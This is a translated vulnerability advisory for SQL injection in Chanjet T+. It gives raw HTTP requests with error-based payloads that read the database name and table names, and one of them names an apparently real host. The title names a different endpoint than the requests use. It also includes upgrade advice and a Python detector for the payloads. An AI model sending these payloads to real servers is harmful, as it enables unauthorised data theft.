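Vulnerability verification: SQL injection in the /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx endpoint of Chanjet T+
1. Vulnerability description
The /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx endpoint of Chanjet T+ has a SQL injection vulnerability. An unauthenticated attacker can exploit it to read information from the database.
2. Verification PoC
Verifying the database name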
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: application/json
Content-Length: 139
{"currentAcc":"1","currentAccId":"2' and 1=convert(int,db_name())+'a--+","currentDsName":"1","currentVersion":"1","currentVersionNo":"1"}
Verifying the table name (数据库名 in the request body is a placeholder meaning "database name")
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load HTTP/1.1
Host: dy.dahuaa.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: application/json
Content-Length: 240
{
"currentAcc": "1",
"currentAccId": "2' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog='数据库名'))+'a",
"currentDsName": "1",
"currentVersion": "1",
"currentVersionNo": "1"
}
3. Verification screenshots


4. Remediation
The vendor has released a version that fixes the vulnerability. Users are advised to upgrade to a secure version: https://www.chanjet.com/
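An added example, not part of the original post and not vendor code: until the upgrade is applied, logged or proxied requests to the ajaxpro handlers can be checked for the error-based pattern shown in section 2. The rule names, the function `suspicious_fields` and the benign sample body are assumptions made for this illustration; the flagged body is the one from the first request above.

```python
import json
import re

AJAXPRO_PREFIX = "/tplus/ajaxpro/"  # path prefix of the requests on this page

# Markers of the error-based technique in section 2: a quote that closes the
# string, then a forced int conversion of a metadata value. Names are illustrative.
RULES = {
    "quote_boolean": re.compile(r"'\s*(?:and|or)\b", re.I),
    "convert_int": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "db_name": re.compile(r"\bdb_name\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "sql_comment": re.compile(r"--|/\*"),
}

def _strings(value):
    """Yield every string inside a decoded JSON value, at any depth."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings(v)

def suspicious_fields(path, body):
    """Map each top-level JSON field to the rules its string values match."""
    if not path.lower().startswith(AJAXPRO_PREFIX):
        return {}
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        doc = {"<raw body>": str(body)}  # malformed JSON is scanned as text
    if not isinstance(doc, dict):
        doc = {"<body>": doc}
    findings = {}
    for field, value in doc.items():
        text = "\n".join(_strings(value))
        matched = [name for name, rx in RULES.items() if rx.search(text)]
        if matched:
            findings[field] = matched
    return findings

def _body(acc_id):  # builds the five-field body used by the requests above
    keys = ("currentAcc", "currentDsName", "currentVersion", "currentVersionNo")
    return json.dumps({**dict.fromkeys(keys, "1"), "currentAccId": acc_id})

PATH = "/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load"
PAGE_BODY = _body("2' and 1=convert(int,db_name())+'a--+")  # value from the page
BENIGN_BODY = _body("2")  # constructed sample
```

The `sql_comment` rule matches any `--` and will need tuning against legitimate traffic before it is used for alerting.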